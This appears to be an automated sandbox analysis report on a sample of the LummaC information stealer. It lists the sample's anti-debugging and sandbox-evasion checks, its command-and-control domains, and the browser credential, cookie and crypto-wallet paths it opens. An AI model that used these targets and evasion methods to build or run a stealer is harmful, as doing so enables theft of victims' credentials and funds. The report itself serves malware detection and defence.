                Source: XM6cn2uNux.exe, 00000000.00000003.2341949856.0000000005A0A000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2340853000.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6n2X
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3495987703.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000002.3556878490.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550405641.00000000011C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341077322.0000000005A5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: SICE
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: JProgram Manager
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516130386.0000000001282000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543248927.0000000001282000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520973311.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516588604.000000000122D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: XM6cn2uNux.exe, 00000000.00000003.3492725287.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: XM6cn2uNux.exe, 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\walletsk
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: XM6cn2uNux.exe, 00000000.00000003.3492725287.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: XM6cn2uNux.exe, 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000125C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: XM6cn2uNux.exeString found in binary or memory: Wallets/Ethereum
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
